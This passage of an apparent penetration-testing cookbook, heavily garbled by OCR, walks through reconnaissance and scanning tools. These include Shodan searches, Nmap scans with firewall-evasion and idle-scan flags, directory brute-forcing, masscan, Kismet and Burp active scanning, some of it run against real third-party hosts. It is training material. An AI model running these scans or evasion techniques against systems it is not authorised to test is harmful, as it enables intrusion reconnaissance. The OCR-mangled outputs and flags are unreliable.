The following screenshot shows the output of the preceding command: 


aes fierce -dns google.com -threads 
for google.com: 
re (elole a= exere)|) 
melelelea-eaere)|) 
mrelelelea-eaere)|) 
meleleloa-eaere)|)) 


Trying zone transfer first... 
(os a=9 ene (elele a -eaere))| 
Request timed out or transfer not allowed. 
ns3.google.com 
est timed out or transfer not allowed. 
me [elele|u-eaete)|) 
Request timed out or transfer not allowed. 


Request timed out or transfer not allowed. 


Unsuccessful in zone transfer (it was worth a shot) 
Okay, trying the good old fashioned y... brute force 





DNSdumpster 


This is a free project by Hacker Target to look up subdomains. It relies on https:/scans.io/ for its results. It 
can also be used to get the subdomains of a website. We should always prefer to use more than one tool 
for subdomain enumeration as we may get something from other tools that the first one failed to pick. 


How to do it... 


It is pretty simple to use. We type the domain name we want the subdomains for and it will show us the 
results: 


. @ https://dnsdumpster.com vr 


robot ab a-lole}eMl Mab a _t-1-1-baele MD ob Bele MEE Role} abhoMlelel_Mib a_lelobaet; 





Using Shodan for fun and profit 


Shodan is the world's first search engine to search for devices connected to the internet. It was launched 
in 2009 by John Matherly. Shodan can be used to look up webcams, databases, industrial systems, video 
games, and so on. Shodan mostly collects data on the most popular web services running, such as HTTP, 
HTTPS, MongoDB, FTP, and many more. 


Getting ready 


To use Shodan we will need to create an account on Shodan. 


How to do it... 


To learn about Shodan, follow the given steps: 
1. Open your browser and visit https://www.shodan.io: 


Gg @ https://www.shodan.io 


ee tC(iéiSSS 


Explore Downloads Reports Enterprise Access Contact Us & My Account 


The search engine for Webcams 








es, Explore the Internet of Things ‘e" See the Big Picture 
Use Shodan to discover which of your devices 


Websites are just one part of the Internet. There 


2. We begin by performing a simple search for the FTP services running. To do this we can use the 
following Shodan dorks: port:"21". The following screenshot shows the search results: 


% Se) port: °21 


Explore Downloads Reports Enterprise Access Contact Us 





® Share Search & Download Results / \uil Create Report 


65.75.161.60 
SoftwareWorks Group 


E United States, Redwood City 
Details 


22@ (vsFTPd 2.0.5) 





United States 4,202 23@ Login successful 
China 518,450 214-The following commands are recognized 
Germany 374,494 ABOR ACCT ALLO APPE CDUP CWD DELE EPRT EPSV FEAT HELP LIST MDTM MKD 





Japan 284,307 MODE NLST OPTS PASS PASV PORT PWD QUIT REIN REST RETR RMD RNFR 


Korea, Republic of 252,855 RNTO SITE SIZE SMNT STAT STOR STOU STRU SYST TYPE USER XCUP XCWD XMKD 


3. This search can be made more specific by specifying a particular country/organization: port :"21" 
country:"1N". The following screenshot shows the search results: 





@% SHODAN 







port:*21* country:"IN" Q 


Explore Downloads Reports Enterprise Access Contact Us & My Account 

















*% Exploits Maps ® Share Search & Download Results 





lu Create Report 


103.43.7.23 


Eixire Date Services Pvt. Ltd. 220 ravi sikrona FTP server (MikroTik 6.32.2) ready 
-— 53@ Login incorrect 
= india 
+ Détals 5@@ ‘HELP’: command not understood 
5@@ ‘FEAT’: command not understood 
— ane 203.109.119.44 
YOU Broadband & Cable india Ltd. 
Bangalore 3,099 Xi inci 
New Delhi 2,827 Details 
Mumbai 2,510 
Delhi 4,704 22@ Microsoft FTP Service 
Gurgaon 4,250 53@ User cannot log in, home directory inaccessible 


214-The following commands are recognized (* ==>'s unimplemented) 
ABOR 


We can now see all the FTP servers running in India; we can also see the servers that allow 
anonymous login and the version of the FTP server they are running. 

Next, we try the organization filter. It can be done by typing port:"21" country:"IN" org:"BsnL" aS Shown 
in the following screenshot: 


port:"21" country:"IN" org:"BSNL" 


Explore Downloads Reports Enterprise Access Contact Us & My Account 





® Share Search & Download Results \.ul Create Report 


117.223.178.201 

ese. 22 Welcome to TBS FIP Server 
_ 53@ Login incorrect. 
ae India, Trivandrum 


re Details 262 Command not implemented, superfluous at this site. 
202 Command not implemented, superfluous at this site. 


di 4 

— we 117.218.140.46 

BSNL 22@ ucftpd FTP server ready. 

o i ; r 

FE inde, Bangalore 53@ Login incorrect 
Bangalore 2,320 Details 53@ Please login with USER and PASS 
New Delhi 488 502 FEAT not implemented. 
Chennai 103 
Pune 70 
Hyderabad 44 117.195.226.51 


Shodan has other tags as well that can be used to perform advanced searches, such as: 


e net: to scan IP ranges 
e city: to filter by city 


More details can be found at https:/www.shodan.io/explore. 


Shodan Honeyscore 


Shodan Honeyscore is another great project built in the Python. It helps us figure out whether an IP 
address we have is a honeypot or a real system. 


How to do it... 


The following steps demonstrate the use of Shodan Honeyscore: 


1. To use Shodan Honeyscore we visit https:/honeyscore.shodan.io/: 


= [6M & https://honeyscore.shodan.io 


@, SHODAN 


Honeypot Or Not? 


Enter an IP to check whether it is a honeypot or a real contro 


on 





2. Enter the IP address we want to check, and that's it! 


@ SHopaN 


Honeypot Or Not? 


Enter an IP to check whether it is a honeypot or a real control system: 


cn or 





Shodan plugins 


To make our life even easier, Shodan has plugins for Chrome and Firefox that can be used to check open 
ports for websites we visit on the go! 


How to do it... 


We download and install the plugin from https//www.shodan.io/. Browse any website and we will see that by 
clicking on the plugin we can see the open ports: 






@ 216.58.194.68 
oli 1 1¢100.neg 


City Mountain View 
Country United States 
Organization Google 

s= Ports 


j le View Host Details 


io 


See also 


e The Dnscan recipe from Chapter 1, Kali — An Introduction 
e The Digging deep with theharvester recipe 


Using Nmap to find open ports 


Network Mapper (Nmap) is a security scanner written by Gordon Lyon. It is used to find hosts and 
services in a network. It first came out in September 1997. Nmap has various features as well as scripts 
to perform various tests such as finding the OS, service version, brute force default logins, and so on. 


Some of the most common types of scan are: 


e TCP connect() SCan 
e SYN stealth scan 
e UDP scan 
e Ping scan 
e Idle scan 


How to do it... 


The following is the recipe for using Nmap: 


1. Nmap is already installed in Kali Linux. We can type the following command to start it and see all 
the options available: 


| nmap -h 


The following screenshot shows the output of the preceding command: 


:~# nmap 
7.01 ( hAttps://nmap.org ) 
Usage: nmap [Scan Type(s)] [Options] {target specification} 
TARGET NS) od ol OF os OF IO) 

pass hostnames, IP addresses, networks, etc. 
scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254 
<inputfilename>: Input from list of hosts/networks 
<num hosts>: Choose random targets 

--exclude <host1[,host2][,host3],...>: Exclude hosts/networks 
xcludefile <exclude_file>: Exclude list from file 
DISCOVERY : 

-sL: List Scan - simply list targets to scan 

-sn: Ping Scan - disable port scan 

-Pn: Treat all hosts as online -- skip host discovery 

-PS/PA/PU/PY [portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports 

-PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes 





2. To performa basic scan we use the following command: 


| nmap -sV -Pn x.x.x.x 


The following screenshot shows the output of the preceding command: 


:~# mmap -sV -Pn 192.168.1.1 


Starting Nmap 7.01 ( https://nmap.org ) at 2016-12-19 14:52 MSK 
00:28 elapsed; 0 Ss cpapleted (due (8) 6) haa: =Imelonnale) Service lore] a] 


Stats: 0:54 elapse 
service scan Timing: About 80.00% done; 
n Neen lt for 192.168.1.1 


wn: 995 ‘closed ports 
STATE SERVICE Visiatesae)\) 
open ftp 
open tcpwrapped 
open domain 
'e) open http Realtron WebServer 1.1 
5431/tcp open upnp MiniUPnP 





3. -pn implies that we do not check whether the host is up or not by performing a ping request first. The 
-sv parameter is to list all the running services on the found open ports. 

4. Another flag we can use is -a, which automatically performs OS detection, version detection, script 
scanning, and traceroute. The command is: 


| nmap -A -Pn x.x.x.x 


5. To scan an IP range or multiple IPs, we can use this command: 


nmap -A -Pn x.x.x.0/24 


Using scripts 


The Nmap Scripting Engine (NSE) allows users to create their own scripts to perform different tasks 

automatically. These scripts are executed side by side when a scan is run. They can be used to perform 
more effective version detection, exploitation of the vulnerability, and so on. The command for using a 
script is: 


|nmap -Pn -sV host.com --script dns-brute 


:~# mmap -sV google.com --script dns-brute 


Starting Nmap 7.01 ( https://nmap.org ) at 2016-12-19 14:56 MSK 





The output of the preceding command is as follows: 


ost script results: 
dns-brute: 

DNS Brute-force hostnames: 
id.google.com - 216.58.22 
images.google.com - 216.5 
admin.google.com - 2 
admin.google.com - 2 
ads.google.com - 2 


ads.google.com - zZ 
alerts.google.com - 2 
news.google.com - 216.58. 
alerts.google.com - 2404: 
news.google.com - 
upload.google.com - 216 P 
dns.google.com - 216.58.22 





Here the script ans-brute tries to fetch the available subdomains by brute forcing it against a set of common 
subdomain names. 


See also 


e The Using Shodan for fun and profit recipe 
e More information on the scripts can be found in the official NSE documentation at https://nmap.org/nsedoc/ 


Bypassing firewalls with Nmap 


Most of the time during a pentest, we will come across systems protected by firewalls or Intrusion 
Detection Systems (IDS). The Nmap provides different ways to bypass these IDS/firewalls to perform 
port scans on a network. In this recipe, we will learn some of the ways we can bypass firewalls. 


TCP ACK scan 


The ACK scan (-sa) sends acknowledgment packets instead of SYN packets, and the firewall does not 
create logs of ACK packets as it will treat ACK packets as responses to SYN packets. It is mostly used to 
map the type of firewall being used. 


How to do it... 


The ACK scan was made to show unfiltered and filtered ports instead of open ones. 


The command for ACK scan is: 


|nmap -SA xX.x.x.X 


Let's look at the comparison of how a normal scan differs from an ACK scan: 


root@kali:~# nmap -Pn 1 


Starting Nmap 7.01 ( https://nmap.org ) at 2016-12-18 20:18 MSK 


map scan report for 180. 
ost is up. 
ALL 1000 scanned ports on 180. 2 filtered 





Here we see the difference between a normal scan and an ACK scan: 


root@kali: ~ = Oo x 


root@kali:~# nmap -sA 1 


Starting Nmap 7.01 ( httns://nman.ora ) at 2016-12-18 20:32 
Nmap scan report for 1 


Host is up (0.00034s lLatencv). 
canned ports on 1 are unfiltered 


Nmap done: 1 IP address (1 host up) 
root@kali:~# 





How it works... 


The scan results of filtered and unfiltered ports depends on whether a firewall being used is stateful or 
stateless. A stateful firewall checks if an incoming ACK packet is part of an existing connection or not. It 
blocks it if the packets are not part of any requested connection. Hence, the port will show up as filtered 
during a scan. 


Whereas, in the case of a stateless firewall, it will not block the ACK packets and the ports will show up 
as unfiltered. 


TCP Window scan 


Window scan (-sw) is almost the same as an ACK scan except it shows open and closed ports. 


How to do it... 


Let's look at the difference between a normal scan and a TCP scan: 


1. The command to run is: 


| nmap -SW x.x.x.x 


2. Let's look at the comparison of how a normal scan differs from a TCP Window scan: 


map scan report for 180. 
ost is up. 
ALL 1000 scanned ports on 180. 


:~# mmap -sW 1 


Starting Nmap 7.01 ( https://nmap.org ) at 2016-12-18 
Nmap scan report for 1 
Host is up (0.00035s latency). 
PORT STATE SERVICE 
/tcp open tcpmux 
Aue) open compressnet 
Ace e) open unknown 
6/tcp open unknown 
7/tcp open echo 
(o]0]~|a une Neier] me| 
open daytime 
open qotd 





Idle scan 


Idle scanning is an advanced technique where no packets sent to the target can be traced back to the 
attacker machine. It requires a zombie host to be specified. 


How to do it... 


The command to do an idle scan is: 


| nmap -SI zombiehost.com domain.com 


How it works... 


Idle scan works on the basis of a predictable IPID or an IP fragmentation ID of the zombie host. First, the 
IPID of the zombie host is checked and then a connection request is spoofed from that host to the target 
host. If the port is open, an acknowledgment is sent back to the zombie host which resets (RST) the 
connection as it has no history of opening such a connection. Next, the attacker checks the IPID on the 
zombie again; if it has changed by one step it implies an RST was received from the target. But if the IPID 
has changed by two steps it means a packet was received by the zombie host from the target host and there 
was an RST on the zombie host, which implies that the port is open. 


Searching for open directories 


In the previous recipe, we discussed how to find open ports on a network IP or domain name. We often 
see developers running web servers on different ports. Sometimes developers may also leave directories 
misconfigured that may contain juicy information for us. We have already covered dirsearch in the 
previous chapter; here we will look at alternatives. 


The dirb tool 


The dirb tool is a well-known tool that can be used to brute force open directories. Although it is 
generally slow and does not support multi-threading, it is still a great way to find 
directories/subdirectories that may have been left open due to a misconfiguration. 


How to do it... 


Type the following command to fire up the tool: 


| dirb https: //domain.com 


The following screenshot shows the output of the preceding command: 


:~# dirb https://google.com 


By The Dark Raver 


START_TIME: Sun Dec 18 22:15:29 2016 


URL_BASE: https://google.com/ 
WORDLIST FILES: /usr/share/dirb/wordlists/common.txt 


canning URL: https://google.com/ 
://google.com/2001 (CODE:301|SIZE:224) 





There's more... 


There are other options in dirb, as well, that come in handy: 


-a: to specify a user agent 

: to specify a cookie 

-H: to enter a custom header 

-x: to specify the file extension 


ee ee e® 
1 
i?) 


See also 


e The Dirsearch recipe from Chapter 1, Kali — An Introduction 


Performing deep magic with DMitry 


The Deepmagic Information Gathering Tool (DMitry) is a command-line tool open source application 
coded in C. It has the capability of gathering subdomains, email addresses, whois info, and so on, about a 
target. 


How to do it... 


To learn about DMitry, follow the given steps: 


1. We use a simple command: 


| dmitry -h 
The following screenshot shows the output of the preceding command: 


root@kali: ~ - o 


:~# dmitry -h 
Information Gathering Tool 
be some deep magic going on" 


dmitry: invalid option -- '‘h' 
Usage: / epfb] [-t 0-9] [-o %host.txt] host 
-O 3a output to %shost.txt or to fi ecified by -o file 
| Se K on the IP address of a host 
up on the domain name of a host 
com information on a host 
ie ime) le 


a TCP port scan 10st 
a TCP port scan on a host 1g output reporting filtered p 


from the scanned port 
scanning a TCP port ( Default 2 ) 





2. Next, we try performing an email, whois, TCP port scan, and subdomain search by using the 
following: 


| dmitry -s -e -w -p domain.com 


The following screenshot shows the output of the preceding command: 


# dmitry -s -e -w -p google.com 
Jeepmagic Information Gathering Tool 
There be some deep magic going on" 
16 .58.220.206 
>: google.com 


bathered Inic-whois information for google.com 


Domain Name: GOOGLE.COM 


Registrar: MARKMONITOR INC. 

Sponsoring Registrar IANA ID: 292 

Whois Server: whois.markmonitor.com 
Referral URL: http: ww.markmonitor.com 
Name Server: NS1.GOOGLE.COM 

Name Server: NS2.GOOGLE.COM 

Name Server: NS3.GOOGLE.COM 





Hunting for SSL flaws 


Most of the web applications today use SSL to communicate with the server. The ssiscan is a great tool to 
check SSL for flaws or misconfigurations. 


How to do it... 


To learn about ssiscan follow the given steps: 


1. We will look at the help manual to see the various options the tool has: 


| sslscan -h 


The following screenshot shows the output of the preceding command: 





2. To run the tool against a host we type the following: 


| sslscan host.com:port 


The following screenshot shows the output of the preceding command: 


OpenSSL 1.0.2 


Testing SSL server 


to heartbleed 
to heartbleed 
to heartbleed 





See also 


e The A tale of a bleeding heart recipe from Chapter 5, Network Exploitation on Current Exploitation 


TLSSLed is also an alternative we can use in Kali to perform checks on SSL. 


Exploring connections with intrace 


The intrace tool is a great tool to enumerate IP hops on existing TCP connections. It can be useful for 
firewall bypassing and gathering more information about a network. 


How to do it... 


Run the following command: 


| intrace -h hostname.com -p port -s sizeofpacket 


The following screenshot shows the output of the preceding command: 


:~# intrace -h google.com -p 443 -s 4_ 





Digging deep with theharvester 


The theharvester tool is a great tool for penetration testing as it helps us find a lot of information about a 
company. It can be used to find email accounts, subdomains, and so on. In this recipe, we will learn how 
to use it to discover data. 


How to do it... 


The command is pretty simple: 


| theharvester -d domain/name -1 20 -b all 


The following screenshot shows the output of the preceding command: 


:~# thehe er -d packtpub -1 10 -b linkedin 


fob tototoftototokotatotadotok folio tot tototofofototfodototototofotototototokototoatotototode at dota ato fet 


dob Rb bt 


[-] Searching in Linkedin.. 





How it works... 


In the preceding recipe, -a is for the domain name or the keyword we want to search, -1 is for limiting the 
number of search results, and -b is the source we want the tool to use while gathering information. The 
tool supports Google, Google CSE, Bing, Bing API, PGP, LinkedIn, Google Profiles, people123, Jigsaw, 
Twitter, and Google Plus sources. 


Finding the technology behind web apps 


There is no point starting a pentest against a web application without knowing what the actual technology 
behind it is. For example, it would be absolutely useless to run dirsearch to look for files with the 
extension .php when the technology is actually ASP.NET. So, in this recipe, we will learn to use a simple 
tool whatweb to understand the technology behind a web app. It comes by default in Kali. 


It can also be installed manually from the URL https:/github.com/urbanadventurer/WhatWeb. 


How to do it... 


The use of whatweb can be done as follows: 


1. The tool can be launched by using the following command: 


| whatweb 


The following screenshot shows the output of the preceding command: 


$. $$$ $. 

$$. .$$$ $$$ .$$$$$$. .$$$SH$$$HS$. $$SS $$. .$$$$$$$. .$$$$$$. 
$$$ $ $$ $$$ $ $$$$$$. $$$$S $$$SSH $ $F $$$ $ $$ $$ $ $$$$S$. 
$$$ $$ $$$ $ °$ $$$ $$' $$ : $$$ $$ $$ $$$" 


- $$$ $. $$$$$$ $. $$$$$$ “$ $. $ : g $$$ $. $$$$ $. $$HH$H. 
::$  . «$$$ $::$ $$$ $::$ $$$ $:: a3 2 SSS $305 $::$ $$$$ 
13% $$$ $$$ $;;$ $$$ $554 $$$ $ $$$ $$$ $354 $;;$ $$$$ 
$$$$$h $$$h$ $$$ $$d $$$ $$$ $ $$ $$$$$ S$$$$S$S$s $HShS ss ss 


generation web scanner rsion 0.4.8-dev. 
/ Horton a urbana r d Brendan Coles 
aaa morningstarsecurity.com/ ea /whatweb 


Usage: whatweb [options] <URLs> 





2. The domain name can be given as a parameter, or multiple domain names can be entered by using a - 
-input-file argument: 


| whatweb hostname.com 


The following screenshot shows the output of the preceding command: 





# whatweb google.com 


Scanning IPs with masscan 


The masscan tool is an amazing tool; it is the fastest port scan tool. It is supposed to scan the entire internet 
when it transmits at a speed of 10 million packets per second. It is a good alternative for Nmap when we 
know exactly what ports we are looking for in a network. 


It is similar to Nmap, however, in that it does not support default port scanning all ports must be specified 
USING -p. 


How to do it... 


The masscan tool is simple to use. We can begin a scan of a network by using the following command: 


| masscan 192.168.1.0/24 -p 80,443, 23 


The following screenshot shows the output of the preceding command: 


:~# masscan 192.160.1.0/24 -p 80,443,23 





We can also specify the packet rate by using --max-rate. By default, the rate is 100 packets per second. Using 
it is not recommended as it will put a lot of load on the network device. 


Sniffing around with Kismet 


Kismet is a layer 2 wireless network detector. It comes in handy because while performing pentest in a 
corporate environment, we may need to look for wireless networks as well. Kismet can sniff 
802.11a/b/g/n traffic. It works with any wireless card that supports raw monitoring modes. 


In this recipe, we will learn how to use Kismet to monitor Wi-Fi networks. 


How to do it... 


To learn about Kismet follow the given steps: 


1. We use the following command to launch Kismet: 


| kismet 


The following screenshot shows the output of the preceding command: 


x root@bt: ~ 


Kismet 


Not 
Connected 


Some terminals don't display some 
ole] ta ron 


colors (notably, d 
The next 


rk grey) 
line of text should 


a 

read ‘Dark grey text’: 
Is it visible? 
will not be 
can always 


If you answer 'No', dark grey 
d in the default color 
change colors to your 
Kismet->Preferences->Colors. 


scheme. Remember, 


you 
taste by going to 


[ No ] [ Yes ] 


INFO: Failed to load preferences file, will use defaults 
INFO: Auto-connecting to tcp://localhost:2501 
#: Could not connect to Kismet server ‘localhost:2501' 


INFO: Welcome to the Kismet Newcore Client... 


(Connecti 
~' to ac 





. Press or 


2. Once the GUI is up, it will ask us to start the server, and we choose yes: 


gore) dG) +) eee 


Kismet 


ot 
Connected 


Data 


(Connection refused) 
s#: Could not connect to 
(Connection refused) 
#: Could not connect to 


will attempt to reconnect in 5 
Kismet server ‘Localhost:2501 
will attempt to reconnect in 5 
Kismet server ‘Localhost:2501 


seconds. 


seconds. 


(Connection refused) will attempt to reconnect in 5 seconds. 


3. Next, we need to specify a source interface, in our case it is wlano, SO we type that. Make sure the 


interface is in monitor mode before initializing it in Kismet: 


x root@bt: ~ 


Creating network tracker... 

Reading config file ‘/root/.kismet//ssid map.conf': 
Reading config file ‘/root/.kismet//tag.conf': 2 
Creating channel tracker... 

Registering dumpfiles... 

Pcap Log in PPI format 
Opened pcapdu 
Opened netxml Intf 
Opened nettxt 

Opened gpsxml 

Opened alert 
Kismet starti 
No packet sou 

client, or by 

(/usr/local/e 

Could not co 
Kismet server accepted connection from 127.0.0.1 
Could not connect to the GPSD server, will 
Could not connect to the GPSD server, will 
Could not connect to the GPSD server, will 
Could not connect to the GPSD server, will 





| 





ERROR: 
INFO: 

ERROR: 
ERROR: 
ERROR: 
ERROR: 


4. Now we will see a list of all the wireless networks around us: 


2 (No such file or 


(No such file or dire 


pcapdump 
txml 
ttxt 
sxml 

rt 


he Kismet 


in 5 seconds 


reconnect in 
reconnect in 
reconnect in 
reconnect in 











5. By default, Kismet listens on all the channels, so we can specify a particular channel by selecting the 
entry Config Channel... from the Kismet menu: 





6. We can choose the channel number here: 


Chan/Freq 





7. Kismet also allows us to see the signal to noise ratio. We can see that by selecting Channel Details... 
in the Windows menu: 


Channel Details... 





8. This signal to noise ratio is very helpful during times of wardriving: 





Testing routers with firewalk 


The firewalk tool is a network security reconnaissance tool that helps us figure out whether our routers are 
actually doing the job they are supposed to do. It attempts to find what protocols a router/firewall will 
allow and what it will block. 


This tool is incredibly useful during pentesting to verify and validate firewall policies in a corporate 
environment. 


How to do it... 


The following is the recipe for using firewalk: 


1. If firewaik is not found, we can install it using: 


| apt install firewalk 


2. We can use the following command to run firewalk: 


| firewalk -S1-23 -i ethO 192.168.1.1 192.168.10.1 


The following screenshot shows the output of the preceding command: 


:~# firewalk -S 1-23 -i ethO 192.168.1.1 192.168.10.1 
ateway ACL scanner] 
initialization completed successfully. 


source port: 53, destination port: 33434 





How it works... 


In the preceding command, -i is for specifying the network interface, -s is for specifying the port numbers 
we want to test, and the next two are the router's IP address and the host's IP address that we want to 
check against our router. 


map.org/nsedoc/. 


@ Nmap also includes a script to perform firewalk. More information can be found at https:/m 


Vulnerability Assessment 


In this chapter, we will cover the following recipes: 


Using the infamous Burp 

Exploiting WSDLs with Wsdler 
Using Intruder 

Web app pentest with Vega 
Exploring SearchSploit 

Exploiting routers with RouterSploit 
Using Metasploit 

Automating Metasploit 

Writing a custom resource script 
Databases in Metasploit 


Introduction 


In the previous chapters, we covered various recipes to collect information about our target. Now, once 
we have all that data, we need to start hunting for vulnerabilities. To become a good pentester, we need to 
make sure no small details are overlooked. 


Using the infamous Burp 


Burp has been around for years now; it is a collection of multiple tools built in Java by PortSwigger web 
security. It has various products, such as Decoder, Proxy, Scanner, Intruder, Repeater, and so on. Burp 
features an Extender, which allows a user to load different extensions that can be used to make pentesting 
even more efficient! You will learn about some of them in the upcoming recipes. 


How to do it... 


Let's take a look at how we can use Burp effectively: 


1. Kali already has a free version of Burp, but we will need a full version to fully use its features. So, 
we open up Burp: 


eee Burp Suite Professional v1.7.15 - licensed to Himanshu Sharma [single user license] ] 
| Welcome to Burp Suite Professional. Use the options below to create or open a project. E RURPSUITE 
PROFESSIONAL 


@ Temporary project 


© New project on disk File | Choose file... | 


Name 


\) Open existing project 





“Test /Volumes /Transcend/Office/ test.burp 


File: Choose file... | 


| Cancel | | Next | 





2. Click on Start Burp and we will see the Burp load up: 


rw? CEP OVS PiViessr ie! Vi. Say Pes © PS WY es Oe (Sage Vee Tee) 
furp intruder Repeater Window Help 


Proxy | Spider | Scanner | intruder | Repeater | Sequencer | Decoder | Comparer | Cetender | Project options | User options | Alerts 
Scope 


Fitter Hiding met fownd tems hiding C45. menage and general binary content. hiding 45 responses, hiding empty folders (2 


Contents issues 
snet peated 5 UR: | Perens _ (Saeed 











2] < ra >| Type 2 search term O matches 





3. Before we start hunting for bugs, we first install some extensions that may come in handy. Select 
BApp Store from the Extender menu: 


BApp Store 


The BApp Store contains Burp extensions that have been written by users of Burp Suite, to exten 








WCF Deserializer 
WebInspect Connector 


titi Pro extension 





Name | Installed —_| Rating | Detail 
NMAP Parser O kt a 
Notes O kiki 
Paramalyzer ie) kok 
ParrotNG Oo totototok Pro extension 
Payload Parser O kickin: 
Pcap Importer Oo tots Pro extension 
PDF Metadata O toot 
PDF Viewer Oo wkikkek 
Protobuf Decoder G Se @.@. e*4 
Python Scripter O kik ksk 
Random IP Address Header ie) 5 0 eee 4 
Reflected Parameters Oo ttt: Pro extension 
Reissue Request Scripter G Se @.0.@.4 
Report To Elastic Search Oo S 202.24 Pro extension 
Request Randomizer BG S 8 2.2.2.4 
Retire.js Oo kiekkn Pro extension | 
SAML Editor Oo kiki: : 
SAML Encoder / Decoder Oo wiekin 
SAML Raider a Se 2 204 
Sentinel O Se @ 2. ond 
Session Auth G toot 
Session Timeout Test O toot: 
Site Map Fetcher ie} Kottke 
Software Version Reporter Oo toto Pro extension 
SQLiPy O kik: 
ThreadFix O be @ @ etd Pro extension 
Oo 
O 
WebSphere Portlet State Dec... a) kwiekin 

What-The-WAF O Se eteterd 

WSDL Wizard O b 2 2 sters 

Wsdler O wii 

XSS Validator O toto: ’ 





4. We will see a list of extensions. Some of the extensions we will have to install are as follows: 
e J2EEScan 
e Wsdler 
e Java Deserialization Scanner 


e HeartBleed 
5. Click on Install after selecting each of these extensions. 


6. Once the extensions are all set, we prepare for scanning. We fire up a browser and go to its 
preferences: 


General Network Update _ Encryption 
Connection 


Configure how Firefox connects to the Internet Settings... 


Offline Storage 


7. In Network settings, we add our HTTP Proxy IP and Port: 


Contigure Proxies to Access the Internet 
No proxy 
Auto-detect proxy settings for this network 
Use system proxy settings 


© Manual proxy configuration: 


Use this proxy server for all protocols 


SSL Proxy: 127.0.0.1 Port: 8080 ° 
FTP Proxy: 127.0.0.1 Port: 8080 ° 
SOCKS Host: 127.0.0.1 Port 8080 ° 


SOCKS v4 « SOCKS v5 


No Proxy for: localhost, 127.0.0.1 
Example: .mozilla.org, .net.nz, 192.168.1.0/24 
Automatic proxy configuration URL: 


Reload 


@ Conce! (OK 


8. We can verify this with the Burp's Options tab under the Proxy menu: 
intercept | HTTP history | WebSockets history [ Options | 


(2) Proxy Listeners 








(@) Burp Proxy uses listeners to receive incoming HTTP requests from your browser. You will need to configure your browser to usec 





Add Running _| Interface | Invisible | Redirect | Certificate | 
 @ 127.0.0.1:8080 Bo Per-host 
| Edit | 
| Remove | > 


9. Click on Intercept is on to start intercepting the requests: 


10. 
11. 


12, 


13. 








Jofepeep | HTTP history | WebSockets history | Options 





(4) © Request to https://in.search.yahoo.com:443 [106.10.170.150} 


Forward Drop Intercept is on Action 


Raw | Params | Headers | Hex 


















=iryshsimp=yhs- ‘tad 16 O04&6paraml=yhsbea néparam2 

BOAtBtcG N2Y1L1IQzu2S5StBtByBOFzy0Ezz0Ft 
N16 lV at3Dmcy nxtad 16 4 HTTP/1.1 

io 00.com 

Us gen ‘5.0 (Macintosh; Intel Mac OS X 10,12; rv:7.0.1) Gecko/20100101 Firefox 

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 

Accept-Language: en-us,en;q=0.5 

Accept coding: gzip, = 

Accept-Ch : 180-8859-1,utf-8;q=0.7,*;q=0.7 

connec - 


Now we browse the website we need to scan. 
Once all requests are captured, we can simply go to Target and select our domain. 


To perform a scan, we can select individual requests and send them for an active scan: 









Lhttp://testphp.vu... 9) 
http://testphp.vulnwe... GET {AJAX /indg 
http://testphp.vulnwe... GET {Mod_Rew 








[?) GET: cat=1 
Add to scope 





http://testphp.vulnwe... GET fartists.ph 
http://testphp.vulnwe... GET /artists.ph Spider from here 
http://testphp.vulnwe... GET /artists.ph Do an active scan 


httn:/ /tectnhn wilmae CPT feart nhn Ain a naccivea eran 


Or, we can select the whole domain to send for an active scan: 


[site map | scope | 
| Filter: Hiding not found items; hiding CSS, image and gen¢ 


> MO https://172.20.0.4:8090 
http:/ /download.macromedia.com 





» http:/ /testphp.vulnweb.com / 
Add to scope 
Spider this host 
Actively scan this host 
Passively scan this host 


Vvvvvv’ vaasyv 


Engagement tools 
Compare site maps 
Expand branch 

Expand requested items 
Delete host 

Copy URLs in this host 
Copy links in this host 
Save selected items 
Issues 

View 

Show new site map window 


Site map help 











P | Framee 


14. Once we have sent the requests to the Scanner, we will go to the Scanner tab and choose Options. 
Here, we can actually tell the scanner what exactly we want it to look for in our application: 


2?) Active Scanning Areas 
(a) These settings control the types of checks performed during active scanning. 
@ SQL injection 
@ Error-based @) MSSQL-specific checks 
Time-delay checks @) Oracle-specific checks 


@) Boolean condition checks MySQL-specific checks 


@ OS command injection 
@ Informed @ Blind 


@) Server-side code injection 

@ Server-side template injection (requires reflected XSS) 
(@) Reflected XSS 

W) Stored XSS 

@ Reflected DOM issues 

@) Stored DOM issues 

@) File path traversal / manipulation 

@ External / out-of-band interaction 

@) HTTP header injection 

@ SMTP header injection 

@ XML / SOAP injection 

@ LDAP injection 

@ Cross-site request forgery 

@) Open redirection 

@ Header manipulation 

@ Server-level issues 

() Input returned in response (reflected) 


() Input returned in response (stored) 


15. We can see the results of our scan in the Scan queue tab: 


@0e@ Scan item 4 | 5 issues | 42% comp 





! SQL injection 

i Cross-domain Referer leakage 

i Email addresses disclosed 

j Frameable response (potential Clickjacking) 





16. The Scan queue tab can be seen in the following screenshot: 


[Issue activity | Scan queue | Live scanning Issue definitions Options 








# « Host 


| URL 


| Status 

















https://172.20.0.4:8090 


http://testphp.vulnweb.com 
http://testphp.vulnweb.com 
http://testphp.vulnweb.com 
http://testphp.vulnweb.com 
http://testphp.vulnweb.com 
http://testphp.vulnweb.com 
http://testphp.vulnweb.com 
http:/ /testphp.vulnweb.com 
http://testphp.vulnweb.com 
http://testphp.vulnweb.com 
http://testphp.vulnweb.com 
http://testphp.vulnweb.com 
http:/ /testphp.vulnweb.com 
http://testphp.vulnweb.com 
http://testphp.vulnweb.com 
http://testphp.vulnweb.com 
http://testphp.vulnweb.com 
http://testphp.vulnweb.com 
http://testphp.vulnweb.com 
http://testphp.vulnweb.com 
http://testphp.vulnweb.com 
http://testphp.vulnweb.com 





! SQL injection 


/login.xml 


/categories.php 
/listproducts.php 
/AJAX/index.php 


/Mod_Rewrite_Shop/ 


/artists.php 
/artists.php 
/cart.php 
/comment.php 
/comment.php 
/disclaimer.php 
/guestbook.php 
/hpp/ 
/index.php 
/listproducts.php 
/login.php 
/privacy.php 
/product.php 
/product.php 
/search.php 
/search.php 
/showimage.php 
/userinfo.php 


i Cross-domain Referer leakage 





66% complete 
28% complete 
66% complete 
60% complete 
66% complete 
14% complete 
66% complete 
33% complete 
42% complete 
0% complete 
waiting 
waiting 
waiting 
waiting 
waiting 
waiting 
waiting 
waiting 
waiting 
waiting 
waiting 
waiting 


The following screenshot shows the results of the Scan queue tab in more detail: 


